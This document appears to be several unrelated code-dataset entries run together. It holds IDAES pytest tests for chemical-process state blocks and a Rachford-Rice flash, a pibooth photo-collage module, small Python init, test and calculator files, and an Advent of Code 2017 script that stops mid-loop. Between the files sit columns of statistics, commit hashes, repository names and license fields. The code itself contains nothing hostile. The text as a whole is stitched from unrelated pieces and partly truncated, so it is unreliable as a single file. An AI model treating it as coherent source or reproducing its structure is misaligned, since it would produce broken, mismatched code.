assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 3
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 9
for i in frame.props[1].mole_frac_phase_comp:
assert i in [
("p1", "c1"),
("p1", "c2"),
("p1", "c3"),
("p2", "c1"),
("p2", "c2"),
("p2", "c3"),
("p3", "c1"),
("p3", "c2"),
("p3", "c3"),
]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for j in frame.props[1].component_flow_balances:
assert j in frame.params.component_list
assert str(frame.props[1].component_flow_balances[j].body) == str(
frame.props[1].flow_mol * frame.props[1].mole_frac_comp[j]
- sum(
frame.props[1].flow_mol_phase[p]
* frame.props[1].mole_frac_phase_comp[p, j]
for p in frame.props[1].params.phase_list
)
)
assert isinstance(frame.props[1].sum_mole_frac, Constraint)
assert len(frame.props[1].sum_mole_frac) == 3
for p in frame.props[1].sum_mole_frac:
assert p in frame.params.phase_list
assert str(frame.props[1].sum_mole_frac[p].body) == str(
sum(
frame.props[1].mole_frac_phase_comp[p, i]
for i in frame.props[1].params.component_list
)
)
assert not hasattr(frame.props[1], "sum_mole_frac_out")
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 3
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i] * frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[i]
)
assert_units_consistent(frame.props[1])
@pytest.mark.unit
def test_initialization(self, frame):
state_initialization(frame.props[1])
assert isinstance(frame.props[1].temperature, Var)
assert isinstance(frame.props[1].pressure, Var)
assert isinstance(frame.props[1].flow_mol, Var)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert isinstance(frame.props[1].flow_mol_phase_comp, Expression)
assert isinstance(frame.props[1].phase_frac, Var)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert frame.props[1].temperature.value == approx(345)
assert frame.props[1].pressure.value == approx(3e5)
assert frame.props[1].flow_mol.value == approx(100)
for p in frame.props[1].phase_list:
assert frame.props[1].phase_frac[p].value == approx(1 / 3)
assert frame.props[1].flow_mol_phase[p].value == approx(100 / 3)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp[p, j].value == approx(1 / 3)
assert approx(100 / 9) == value(
frame.props[1].flow_mol_phase_comp[p, j]
)
frame.props[1].phase_frac["p1"].value = 0.2
frame.props[1].phase_frac["p2"].value = 0.5
frame.props[1].phase_frac["p3"].value = 0.3
state_initialization(frame.props[1])
assert frame.props[1].phase_frac["p1"].value == approx(0.2)
assert frame.props[1].flow_mol_phase["p1"].value == approx(20)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp["p1", j].value == approx(1 / 3)
assert approx(20 / 3) == value(frame.props[1].flow_mol_phase_comp["p1", j])
assert frame.props[1].phase_frac["p2"].value == approx(0.5)
assert frame.props[1].flow_mol_phase["p2"].value == approx(50)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_phase_comp["p2", j].value == approx(1 / 3)
assert approx(50 / 3) == value(frame.props[1].flow_mol_phase_comp["p2", j])
assert frame.props[1].phase_frac["p3"].value == approx(0.3)
assert frame.props[1].flow_mol_phase["p3"].value == approx(30)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp["p3", j].value == approx(1 / 3)
assert approx(30 / 3) == value(frame.props[1].flow_mol_phase_comp["p3", j])
# To avoid side effects
for p in frame.props[1].phase_list:
frame.props[1].phase_frac[p].value = 1 / 3
state_initialization(frame.props[1])
class TestCommon(object):
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {
"a": {"equation_of_state": DummyEoS},
"b": {"equation_of_state": DummyEoS},
},
"state_definition": FTPx,
"pressure_ref": 1e5,
"temperature_ref": 300,
"state_bounds": {
"flow_mol": (0, 0.1, 0.2, pyunits.kmol / pyunits.s),
"temperature": (522, 621, 720, pyunits.degR),
"pressure": (1, 3, 5, pyunits.bar),
},
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Build state block
m.props = m.params.build_state_block([1], default={"defined_state": True})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_convert_vars(self, frame):
# Check that all state var values and bounds were converted correctly
assert frame.props[1].flow_mol.value == 100
assert frame.props[1].flow_mol.lb == 0
assert frame.props[1].flow_mol.ub == 200
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert frame.props[1].pressure.value == 3e5
assert frame.props[1].pressure.lb == 1e5
assert frame.props[1].pressure.ub == 5e5
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert frame.props[1].temperature.value == 345
assert frame.props[1].temperature.lb == 290
assert frame.props[1].temperature.ub == 400
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
# Check supporting variables
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 2
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 6
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 2
assert isinstance(frame.props[1].total_flow_balance, Constraint)
assert len(frame.props[1].total_flow_balance) == 1
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
assert isinstance(frame.props[1].sum_mole_frac, Constraint)
assert len(frame.props[1].sum_mole_frac) == 1
assert not hasattr(frame.props[1], "sum_mole_frac_out")
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 2
assert_units_consistent(frame)
@pytest.mark.unit
def test_calculate_scaling_factors(self, frame):
frame.props[1].calculate_scaling_factors()
assert len(frame.props[1].scaling_factor) == 22
assert frame.props[1].scaling_factor[frame.props[1].flow_mol] == 1e-2
assert frame.props[1].scaling_factor[frame.props[1].flow_mol_phase["a"]] == 1e-2
assert frame.props[1].scaling_factor[frame.props[1].flow_mol_phase["b"]] == 1e-2
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["a", "c1"]]
== 1e-2
)
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["a", "c2"]]
== 1e-2
)
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["a", "c3"]]
== 1e-2
)
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["b", "c1"]]
== 1e-2
)
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["b", "c2"]]
== 1e-2
)
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["b", "c3"]]
== 1e-2
)
assert frame.props[1].scaling_factor[frame.props[1].dens_mol_phase["a"]] == 1e-2
assert frame.props[1].scaling_factor[frame.props[1].dens_mol_phase["b"]] == 1e-2
assert frame.props[1].scaling_factor[frame.props[1].mole_frac_comp["c1"]] == 1e3
assert frame.props[1].scaling_factor[frame.props[1].mole_frac_comp["c2"]] == 1e3
assert frame.props[1].scaling_factor[frame.props[1].mole_frac_comp["c3"]] == 1e3
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["a", "c1"]
]
== 1e3
)
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["a", "c2"]
]
== 1e3
)
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["a", "c3"]
]
== 1e3
)
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["b", "c1"]
]
== 1e3
)
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["b", "c2"]
]
== 1e3
)
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["b", "c3"]
]
== 1e3
)
assert frame.props[1].scaling_factor[frame.props[1].pressure] == 1e-5
assert frame.props[1].scaling_factor[frame.props[1].temperature] == 1e-2
# Test General Methods
@pytest.mark.unit
def test_get_material_flow_terms(self, frame):
for (p, j) in frame.params._phase_component_set:
assert str(frame.props[1].get_material_flow_terms(p, j)) == str(
frame.props[1].flow_mol_phase_comp[p, j]
)
@pytest.mark.unit
def test_get_enthalpy_flow_terms(self, frame):
for p in frame.params.phase_list:
assert str(frame.props[1].get_enthalpy_flow_terms(p)) == str(
frame.props[1]._enthalpy_flow_term[p]
)
assert str(frame.props[1]._enthalpy_flow_term[p].expr) == str(
frame.props[1].flow_mol_phase[p] * frame.props[1].enth_mol_phase[p]
)
@pytest.mark.unit
def test_get_material_density_terms(self, frame):
for (p, j) in frame.params._phase_component_set:
assert str(frame.props[1].get_material_density_terms(p, j)) == str(
frame.props[1]._material_density_term[p, j]
)
assert str(frame.props[1]._material_density_term[p, j].expr) == str(
frame.props[1].dens_mol_phase[p]
* frame.props[1].mole_frac_phase_comp[p, j]
)
@pytest.mark.unit
def test_get_energy_density_terms(self, frame):
for p in frame.params.phase_list:
assert str(frame.props[1].get_energy_density_terms(p)) == str(
frame.props[1]._energy_density_term[p]
)
assert str(frame.props[1]._energy_density_term[p].expr) == str(
frame.props[1].dens_mol_phase[p]
* frame.props[1].energy_internal_mol_phase[p]
)
@pytest.mark.unit
def test_default_material_balance_type(self, frame):
assert (
frame.props[1].default_material_balance_type()
== MaterialBalanceType.componentTotal
)
@pytest.mark.unit
def test_default_energy_balance_type(self, frame):
assert (
frame.props[1].default_energy_balance_type()
== EnergyBalanceType.enthalpyTotal
)
@pytest.mark.unit
def test_get_material_flow_basis(self, frame):
assert frame.props[1].get_material_flow_basis() == MaterialFlowBasis.molar
@pytest.mark.unit
def test_define_state_vars(self, frame):
assert frame.props[1].define_state_vars() == {
"flow_mol": frame.props[1].flow_mol,
"mole_frac_comp": frame.props[1].mole_frac_comp,
"temperature": frame.props[1].temperature,
"pressure": frame.props[1].pressure,
}
@pytest.mark.unit
def test_define_display_vars(self, frame):
assert frame.props[1].define_display_vars() == {
"Total Molar Flowrate": frame.props[1].flow_mol,
"Total Mole Fraction": frame.props[1].mole_frac_comp,
"Temperature": frame.props[1].temperature,
"Pressure": frame.props[1].pressure,
}
@pytest.mark.unit
def test_conc_mol(self, frame):
assert isinstance(frame.props[1].conc_mol_comp, Expression)
assert len(frame.props[1].conc_mol_comp) == 3
assert isinstance(frame.props[1].conc_mol_phase_comp, Expression)
assert len(frame.props[1].conc_mol_phase_comp) == 6
@pytest.mark.unit
def test_unphysical_mol_fraction_fail(self, frame):
frame.props[1].mole_frac_comp["c1"].value = -0.1
with pytest.raises(
ValueError,
match="Component c1 has a negative mole fraction "
"in block props\[1\]. Check your initialization.",
):
frame.props[1].params.config.state_definition.state_initialization(
frame.props[1]
)
class TestModifiedRachfordRice(object):
@pytest.fixture(scope="class")
def model(self):
m = ConcreteModel(name="George")
m.component_list = ["a", "b", "c"]
m.mole_frac_comp = Var(m.component_list, initialize=1 / len(m.component_list))
m.K = {"a": 0.5, "b": 1, "c": 3}
return m
@pytest.mark.unit
def test_flash(self, model):
m = model
vl_comps_list = [["a", "b", "c"], ["b", "c"], ["a", "b"], ["b"], ["c"], [], []]
l_only_comps_list = [[], ["a"], [], ["a"], ["a", "b"], ["a", "b", "c"], []]
v_only_comps_list = [[], [], ["c"], ["c"], [], [], ["a", "b", "c"]]
eps_list = [None, 0, 0.01]
# Who will validate the validation?
assert len(vl_comps_list) == len(l_only_comps_list)
assert len(vl_comps_list) == len(v_only_comps_list)
expected_output = np.array(
[
[0.75, 0.25, 1 - 1e-5, 0.5, 1e-5, 1e-5, 1 - 1e-5],
[0.75, 0.25, 1, 0.5, 0, 0, 1],
[0.75, 0.25, 0.99, 0.5, 0.01, 0.01, 0.99],
]
)
for i in range(len(vl_comps_list)):
for j in range(len(eps_list)):
if eps_list[j] is not None:
vap_frac = _modified_rachford_rice(
m,
m.K,
vl_comps_list[i],
l_only_comps_list[i],
v_only_comps_list[i],
eps=eps_list[j],
)
else:
vap_frac = _modified_rachford_rice(
m,
m.K,
vl_comps_list[i],
l_only_comps_list[i],
v_only_comps_list[i],
)
# Convergence criterion for Newton's method is 1e-6 (because
# we expect to pass it off to IPOPT later). We cannot expect
# machine precision here.
assert expected_output[j, i] == approx(vap_frac, rel=5e-5)
@pytest.mark.unit
def test_negative_K(self, model, caplog):
m = model
m.K["a"] = -1
vap_frac = _modified_rachford_rice(m, m.K, m.component_list, [], [])
assert vap_frac is None
assert len(caplog.records) == 1
record = caplog.records[0]
assert record.levelno == idaeslog.WARNING
assert record.getMessage() == (
"While initializing block George, the vapor/liquid split ratio "
"of Component a was calculated to be negative. Check the "
"implementation of the saturation pressure, Henry's law method, "
"or liquid density."
)
m.K["a"] = 0.5
@pytest.mark.unit
def test_unphysical_mole_fracs(self, model, caplog):
m = model
m.mole_frac_comp["a"] = -20
m.mole_frac_comp["b"] = -20
m.mole_frac_comp["c"] = -20
vap_frac = _modified_rachford_rice(m, m.K, ["a"], ["b"], ["c"])
assert vap_frac is None
assert len(caplog.records) == 1
record = caplog.records[0]
assert record.levelno == idaeslog.WARNING
assert record.getMessage() == (
"Block George - phase faction initialization using "
"modified Rachford-Rice failed. This could be "
"because a component is essentially "
"nonvolatile or noncondensible, or "
"because mole fractions sum to more than "
"one."
)
m.mole_frac_comp["a"] = 1 / 3
m.mole_frac_comp["b"] = 1 / 3
m.mole_frac_comp["c"] = 1 / 3
| 41.164021
| 88
| 0.591404
| 7,978
| 62,240
| 4.427801
| 0.050765
| 0.105648
| 0.188393
| 0.070743
| 0.886426
| 0.876943
| 0.859873
| 0.848776
| 0.827969
| 0.817466
| 0
| 0.031713
| 0.28464
| 62,240
| 1,511
| 89
| 41.191264
| 0.761679
| 0.049197
| 0
| 0.708973
| 0
| 0
| 0.049845
| 0.00073
| 0
| 0
| 0
| 0
| 0.362167
| 1
| 0.04042
| false
| 0.001617
| 0.013743
| 0.000808
| 0.070331
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f414dc3dfdf1e214fd2fd2061d5f89d78b5e307
| 10,102
|
py
|
Python
|
pibooth/pictures/concatenate.py
|
ifoche/pibooth
|
e97098ef06bfb7c43a9e74cbaa7aad10653cf487
|
[
"MIT"
] | 1
|
2018-12-17T16:40:02.000Z
|
2018-12-17T16:40:02.000Z
|
pibooth/pictures/concatenate.py
|
ifoche/pibooth
|
e97098ef06bfb7c43a9e74cbaa7aad10653cf487
|
[
"MIT"
] | null | null | null |
pibooth/pictures/concatenate.py
|
ifoche/pibooth
|
e97098ef06bfb7c43a9e74cbaa7aad10653cf487
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from PIL import Image, ImageDraw, ImageFont
from pibooth import fonts
from pibooth.pictures import sizing
def new_image_with_background(width, height, background):
"""Create a new image with the given background. The background can be
a RGB color tuple ora PIL image.
"""
if isinstance(background, (tuple, list)):
return Image.new('RGB', (width, height), color=background)
else:
image = Image.new('RGB', (width, height))
image.paste(background.resize(sizing.new_size_keep_aspect_ratio(background.size, image.size, 'outer')))
return image
def concatenate_pictures_portrait(pictures, footer_texts, bg_color, text_color, inter_width=None):
"""
Merge up to 4 PIL images in portrait orientation.
+---------+ +---------+ +---+-+---+ +---------+
| | | +-+ | | |1| | | +-+ +-+ |
| | | |1| | | +-+ | | |1| |2| |
| +-+ | | +-+ | | +-+ | | +-+ +-+ |
| |1| | | | | |2| | | |
| +-+ | | +-+ | | +-+ | | +-+ +-+ |
| | | |2| | | +-+ | | |3| |4| |
| | | +-+ | | |3| | | +-+ +-+ |
+---------+ +---------+ +---+-+---+ +---------+
"""
widths, heights = zip(*(i.size for i in pictures))
# From here on we assume that all the images have the same heights and widths
if inter_width is None:
inter_width = max(heights) // 20
if len(pictures) == 1:
new_width = max(widths) + inter_width * 2
new_height = max(heights) + inter_width * 2
elif len(pictures) == 2:
new_width = max(widths) + inter_width * 2
new_height = max(heights) * 2 + inter_width * 3
elif len(pictures) == 3:
new_width = max(widths) + inter_width * 2
new_height = max(heights) * 3 + inter_width * 4
elif len(pictures) == 4:
new_width = max(widths) * 2 + inter_width * 3
new_height = max(heights) * 2 + inter_width * 3
else:
raise ValueError("List of max 4 pictures expected, got {}".format(len(pictures)))
matrix = Image.new('RGBA', (new_width, new_height))
x_offset = inter_width
y_offset = inter_width
# Assume the photos are correctly ordered
matrix.paste(pictures[0], (x_offset, y_offset))
if len(pictures) == 2:
y_offset += (pictures[0].size[1] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
elif len(pictures) == 3:
y_offset += (pictures[0].size[1] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
y_offset += (pictures[1].size[1] + inter_width)
matrix.paste(pictures[2], (x_offset, y_offset))
elif len(pictures) == 4:
x_offset += (pictures[0].size[0] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
y_offset += (pictures[1].size[1] + inter_width)
x_offset = inter_width
matrix.paste(pictures[2], (x_offset, y_offset))
x_offset += (pictures[2].size[0] + inter_width)
matrix.paste(pictures[3], (x_offset, y_offset))
final_width, final_height = 2400, 3600
if not footer_texts[0] and not footer_texts[1]:
matrix_width, matrix_height = final_width, final_height
footer_size = 0
else:
matrix_width, matrix_height = 2400, 3000
footer_size = 600
matrix = matrix.resize(sizing.new_size_keep_aspect_ratio(
matrix.size, (matrix_width, matrix_height)), Image.ANTIALIAS)
final_image = new_image_with_background(final_width, final_height, bg_color)
final_image.paste(matrix, ((final_width - matrix.size[0]) // 2,
(final_height - footer_size - matrix.size[1]) // 2), mask=matrix)
if footer_size:
# Text part
draw = ImageDraw.Draw(final_image)
# Footer 1
name_font = ImageFont.truetype(fonts.get_filename("Amatic-Bold.ttf"), int(2 / 3. * footer_size))
name_width, name_height = draw.textsize(footer_texts[0], font=name_font)
footer_x = (final_width - name_width) // 2
footer_y = final_height - footer_size - 100
draw.text((footer_x, footer_y), footer_texts[0], text_color, font=name_font)
# Footer 2
date_font = ImageFont.truetype(fonts.get_filename("AmaticSC-Regular.ttf"), int(1 / 3. * footer_size))
date_width, date_height = draw.textsize(footer_texts[1], font=date_font)
footer_x = (final_width - date_width) // 2
footer_y = final_height - footer_size + 300
draw.text((footer_x, footer_y), footer_texts[1], text_color, font=date_font)
return final_image
def concatenate_pictures_landscape(pictures, footer_texts, bg_color, text_color, inter_width=None):
"""
Merge up to 4 PIL images in landscape orientation.
+-------------+ +-------------+ +-------------+ +---+-+-+-+---+
| +-+ | | +-+ +-+ | | +-+ +-+ +-+ | | |1| |2| |
| |1| | | |1| |2| | | |1| |2| |3| | | +-+ +-+ |
| +-+ | | +-+ +-+ | | +-+ +-+ +-+ | | +-+ +-+ |
| | | | | | | |3| |4| |
+-------------+ +-------------+ +-------------+ +---+-+-+-+---+
"""
widths, heights = zip(*(i.size for i in pictures))
# From here on we assume that all the images have the same heights and widths
if inter_width is None:
inter_width = max(heights) // 20
if len(pictures) == 1:
new_width = max(widths) + inter_width * 2
new_height = max(heights) + inter_width * 2
elif len(pictures) == 2:
new_width = max(widths) * 2 + inter_width * 3
new_height = max(heights) + inter_width * 2
elif len(pictures) == 3:
new_width = max(widths) * 3 + inter_width * 4
new_height = max(heights) + inter_width * 2
elif len(pictures) == 4:
new_width = max(widths) * 2 + inter_width * 3
new_height = max(heights) * 2 + inter_width * 3
else:
raise ValueError("List of max 4 pictures expected, got {}".format(len(pictures)))
matrix = Image.new('RGBA', (new_width, new_height))
x_offset = inter_width
y_offset = inter_width
# Assume the photos are correctly ordered
matrix.paste(pictures[0], (x_offset, y_offset))
if len(pictures) == 2:
x_offset += (pictures[0].size[0] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
elif len(pictures) == 3:
x_offset += (pictures[0].size[0] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
x_offset += (pictures[1].size[0] + inter_width)
matrix.paste(pictures[2], (x_offset, y_offset))
elif len(pictures) == 4:
x_offset += (pictures[0].size[0] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
y_offset += (pictures[1].size[1] + inter_width)
x_offset = inter_width
matrix.paste(pictures[2], (x_offset, y_offset))
x_offset += (pictures[2].size[0] + inter_width)
matrix.paste(pictures[3], (x_offset, y_offset))
final_width, final_height = 3600, 2400
if not footer_texts[0] and not footer_texts[1]:
matrix_width, matrix_height = final_width, final_height
footer_size = 0
else:
matrix_width, matrix_height = 3600, 2100
footer_size = 300
matrix = matrix.resize(sizing.new_size_keep_aspect_ratio(
matrix.size, (matrix_width, matrix_height)), Image.ANTIALIAS)
final_image = new_image_with_background(final_width, final_height, bg_color)
final_image.paste(matrix, ((final_width - matrix.size[0]) // 2,
(final_height - footer_size - matrix.size[1]) // 2), mask=matrix)
if footer_size:
# Text part
draw = ImageDraw.Draw(final_image)
# Footer 1
name_font = ImageFont.truetype(fonts.get_filename("Amatic-Bold.ttf"), int(2 / 3. * footer_size))
name_width, name_height = draw.textsize(footer_texts[0], font=name_font)
footer_x = final_width // 4 - name_width // 2
footer_y = final_height - (footer_size + name_height) // 2 - 50
draw.text((footer_x, footer_y), footer_texts[0], text_color, font=name_font)
# Footer 2
date_font = ImageFont.truetype(fonts.get_filename("AmaticSC-Regular.ttf"), int(1 / 3. * footer_size))
date_width, date_height = draw.textsize(footer_texts[1], font=date_font)
footer_x = 3 * final_width // 4 - date_width // 2
footer_y = final_height - (footer_size + date_height) // 2 - 50
draw.text((footer_x, footer_y), footer_texts[1], text_color, font=date_font)
return final_image
def concatenate_pictures(pictures, footer_texts=('', ''), bg_color=(255, 255, 255), text_color=(0, 0, 0), orientation="auto", inter_width=None):
"""
Merge up to 4 PIL images and return the concatenated image as a new PIL image object.
Configuration of the final picture depends on the number of given pictures.
"""
if orientation == "auto":
# Use the size of the first picture to determine the orientation
if pictures[0].size[0] > pictures[0].size[1]:
orientation = "landscape"
else:
orientation = "portrait"
elif orientation == "revauto":
# Use the size of the first picture to determine the reversed orientation
if pictures[0].size[0] < pictures[0].size[1]:
orientation = "landscape"
else:
orientation = "portrait"
if orientation == "portrait":
return concatenate_pictures_portrait(pictures, footer_texts, bg_color, text_color, inter_width)
elif orientation == "landscape":
return concatenate_pictures_landscape(pictures, footer_texts, bg_color, text_color, inter_width)
else:
raise ValueError("Invalid orientation '{}'".format(orientation))
| 44.113537
| 144
| 0.582162
| 1,258
| 10,102
| 4.453895
| 0.110493
| 0.076745
| 0.039443
| 0.034981
| 0.855435
| 0.839372
| 0.839372
| 0.829734
| 0.821524
| 0.788506
| 0
| 0.029456
| 0.270738
| 10,102
| 228
| 145
| 44.307018
| 0.731098
| 0.183033
| 0
| 0.751634
| 0
| 0
| 0.031662
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026144
| false
| 0
| 0.019608
| 0
| 0.084967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e7c0584389787b5ee6c470822eb1e2484990c42
| 180
|
py
|
Python
|
textbox/data/dataloader/__init__.py
|
JBoRu/TextBox-1
|
0dcbaa153acc507e3d55075312d7ca5d23146e03
|
[
"MIT"
] | 1
|
2021-08-12T01:08:09.000Z
|
2021-08-12T01:08:09.000Z
|
textbox/data/dataloader/__init__.py
|
JBoRu/TextBox-1
|
0dcbaa153acc507e3d55075312d7ca5d23146e03
|
[
"MIT"
] | null | null | null |
textbox/data/dataloader/__init__.py
|
JBoRu/TextBox-1
|
0dcbaa153acc507e3d55075312d7ca5d23146e03
|
[
"MIT"
] | null | null | null |
from textbox.data.dataloader.abstract_dataloader import *
from textbox.data.dataloader.single_sent_dataloader import *
from textbox.data.dataloader.paired_sent_dataloader import *
| 45
| 60
| 0.866667
| 23
| 180
| 6.565217
| 0.391304
| 0.218543
| 0.298013
| 0.496689
| 0.543046
| 0.543046
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 180
| 3
| 61
| 60
| 0.89881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0e983ab2cd6b0a4df6893fccbc7774f551054345
| 121
|
py
|
Python
|
tests/utils/test_functions.py
|
jecalles/genetic-codes
|
ba5bdecf28663a5e6cee77c224e53c02e5ef06d9
|
[
"MIT"
] | null | null | null |
tests/utils/test_functions.py
|
jecalles/genetic-codes
|
ba5bdecf28663a5e6cee77c224e53c02e5ef06d9
|
[
"MIT"
] | null | null | null |
tests/utils/test_functions.py
|
jecalles/genetic-codes
|
ba5bdecf28663a5e6cee77c224e53c02e5ef06d9
|
[
"MIT"
] | null | null | null |
from codes import Code
from codes.utils import definitions
from codes.utils import functions
print(functions.__dir__())
| 20.166667
| 35
| 0.826446
| 17
| 121
| 5.647059
| 0.529412
| 0.28125
| 0.291667
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115702
| 121
| 5
| 36
| 24.2
| 0.897196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0ea012ceef7dcb99d66695696bb4ab532dcf2d93
| 62
|
py
|
Python
|
app/app/calc.py
|
sanjana-302/food-foodie-rest
|
df014e86f8aafc10e9fb0f9ce9dd933ab5f47ae6
|
[
"MIT"
] | null | null | null |
app/app/calc.py
|
sanjana-302/food-foodie-rest
|
df014e86f8aafc10e9fb0f9ce9dd933ab5f47ae6
|
[
"MIT"
] | null | null | null |
app/app/calc.py
|
sanjana-302/food-foodie-rest
|
df014e86f8aafc10e9fb0f9ce9dd933ab5f47ae6
|
[
"MIT"
] | null | null | null |
def add(x, y):
return x + y
def subtract(x, y):
return x - y
| 15.5
| 18
| 0.596774
| 14
| 62
| 2.642857
| 0.428571
| 0.216216
| 0.432432
| 0.486486
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.241935
| 62
| 4
| 19
| 15.5
| 0.787234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
7d2de7116a341d2c49b33088d9c21f2bf4320b90
| 515
|
py
|
Python
|
2017/5/computer.py
|
lvaughn/advent
|
ff3f727b8db1fd9b2a04aad5dcda9a6c8d1c271e
|
[
"CC0-1.0"
] | null | null | null |
2017/5/computer.py
|
lvaughn/advent
|
ff3f727b8db1fd9b2a04aad5dcda9a6c8d1c271e
|
[
"CC0-1.0"
] | null | null | null |
2017/5/computer.py
|
lvaughn/advent
|
ff3f727b8db1fd9b2a04aad5dcda9a6c8d1c271e
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
with open('input.txt', 'r') as f:
memory = [int(a) for a in f]
steps, pc = 0, 0
while 0 <= pc < len(memory):
to_move = memory[pc]
memory[pc] += 1
steps += 1
pc += to_move
print('Part 1', steps)
with open('input.txt', 'r') as f:
memory = [int(a) for a in f]
steps, pc = 0, 0
while 0 <= pc < len(memory):
to_move = memory[pc]
if to_move >= 3:
memory[pc] -= 1
else:
